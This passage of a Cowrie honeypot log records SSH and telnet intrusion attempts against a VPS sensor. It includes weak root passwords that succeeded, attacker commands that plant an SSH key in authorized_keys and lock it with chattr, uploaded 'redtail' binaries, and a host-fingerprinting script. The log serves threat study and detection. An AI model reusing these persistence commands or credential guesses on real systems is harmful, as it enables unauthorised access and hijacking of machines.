","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-31T08:13:56.447205Z","src_ip":"103.96.72.171","session":"d897269484b5"}
{"eventid":"cowrie.login.failed","username":"amssys","password":"amssys","message":"login attempt [amssys/amssys] failed","sensor":"my-vps","timestamp":"2025-08-31T08:14:07.231250Z","src_ip":"103.96.72.171","session":"d897269484b5"}
{"eventid":"cowrie.session.closed","duration":"25.3","message":"Connection lost after 25.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:14:12.594580Z","src_ip":"103.96.72.171","session":"d897269484b5"}
{"eventid":"cowrie.session.connect","src_ip":"103.96.72.171","src_port":55916,"dst_ip":"1.2.3.4","dst_port":22,"session":"73451dc25a1e","protocol":"ssh","message":"New connection: 103.96.72.171:55916 (1.2.3.4:22) [session: 73451dc25a1e]","sensor":"my-vps","timestamp":"2025-08-31T08:14:32.044998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:14:36.109725Z","src_ip":"103.96.72.171","session":"73451dc25a1e"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-31T08:14:36.111313Z","src_ip":"103.96.72.171","session":"73451dc25a1e"}
{"eventid":"cowrie.login.success","username":"root","password":"jenkins123456","message":"login attempt [root/jenkins123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:14:52.064781Z","src_ip":"103.96.72.171","session":"73451dc25a1e"}
{"eventid":"cowrie.session.closed","duration":"22.4","message":"Connection lost after 22.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:14:54.434878Z","src_ip":"103.96.72.171","session":"73451dc25a1e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.143.51","src_port":58276,"dst_ip":"1.2.3.4","dst_port":22,"session":"6092c5b94f87","protocol":"ssh","message":"New connection: 213.209.143.51:58276 (1.2.3.4:22) [session: 6092c5b94f87]","sensor":"my-vps","timestamp":"2025-08-31T08:14:54.469033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:14:54.470001Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:14:54.492172Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.login.success","username":"root","password":"jenkins123456","message":"login attempt [root/jenkins123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:14:54.559038Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:15:00.322211Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-08-31T08:15:00.323109Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:15:00.345479Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-31T08:15:00.366718Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-31T08:15:00.369198Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-31T08:15:00.371577Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-31T08:15:00.373890Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-31T08:15:00.376528Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-31T08:15:00.377647Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:15:00.400226Z","src_ip":"213.209.143.51","session":"6092c5b94f87"}
{"eventid":"cowrie.session.connect","src_ip":"172.88.70.28","src_port":53874,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c12e6405e6d","protocol":"telnet","message":"New connection: 172.88.70.28:53874 (1.2.3.4:23) [session: 2c12e6405e6d]","sensor":"my-vps","timestamp":"2025-08-31T08:15:06.450742Z"}
{"eventid":"cowrie.session.closed","duration":13.16344952583313,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:15:19.614099Z","src_ip":"172.88.70.28","session":"2c12e6405e6d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.114.29","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2266a903bf3","protocol":"ssh","message":"New connection: 196.251.114.29:51824 (1.2.3.4:22) [session: a2266a903bf3]","sensor":"my-vps","timestamp":"2025-08-31T08:15:51.889754Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:15:51.919480Z","src_ip":"196.251.114.29","session":"a2266a903bf3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48120,"dst_ip":"1.2.3.4","dst_port":23,"session":"dc27f3ba030e","protocol":"telnet","message":"New connection: 212.227.125.160:48120 (1.2.3.4:23) [session: dc27f3ba030e]","sensor":"my-vps","timestamp":"2025-08-31T08:16:16.933247Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:16:17.021687Z","src_ip":"212.227.125.160","session":"dc27f3ba030e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:16:17.497761Z","src_ip":"212.227.125.160","session":"dc27f3ba030e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55610,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ecdb3fc5a30","protocol":"ssh","message":"New connection: 217.72.205.35:55610 (1.2.3.4:22) [session: 6ecdb3fc5a30]","sensor":"my-vps","timestamp":"2025-08-31T08:18:06.530404Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:18:06.531535Z","src_ip":"217.72.205.35","session":"6ecdb3fc5a30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49245,"dst_ip":"1.2.3.4","dst_port":23,"session":"2312ebbbd2eb","protocol":"telnet","message":"New connection: 212.227.235.229:49245 (1.2.3.4:23) [session: 2312ebbbd2eb]","sensor":"my-vps","timestamp":"2025-08-31T08:18:51.120939Z"}
{"eventid":"cowrie.session.closed","duration":12.632192611694336,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:03.753061Z","src_ip":"212.227.235.229","session":"2312ebbbd2eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49556,"dst_ip":"1.2.3.4","dst_port":23,"session":"62a56006988b","protocol":"telnet","message":"New connection: 212.227.235.229:49556 (1.2.3.4:23) [session: 62a56006988b]","sensor":"my-vps","timestamp":"2025-08-31T08:19:03.977451Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33854,"dst_ip":"1.2.3.4","dst_port":22,"session":"78c3dbd487b1","protocol":"ssh","message":"New connection: 212.227.125.160:33854 (1.2.3.4:22) [session: 78c3dbd487b1]","sensor":"my-vps","timestamp":"2025-08-31T08:19:08.424258Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57998,"dst_ip":"1.2.3.4","dst_port":22,"session":"783b1ee2626b","protocol":"ssh","message":"New connection: 212.227.125.160:57998 (1.2.3.4:22) [session: 783b1ee2626b]","sensor":"my-vps","timestamp":"2025-08-31T08:19:08.927474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:19:08.928489Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.048868Z","src_ip":"212.227.125.160","session":"78c3dbd487b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.049597Z","src_ip":"212.227.125.160","session":"78c3dbd487b1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.087885Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.574358Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:19:09.912996Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.913716Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.914283Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.915482Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.916724Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.917771Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.918612Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.919690Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
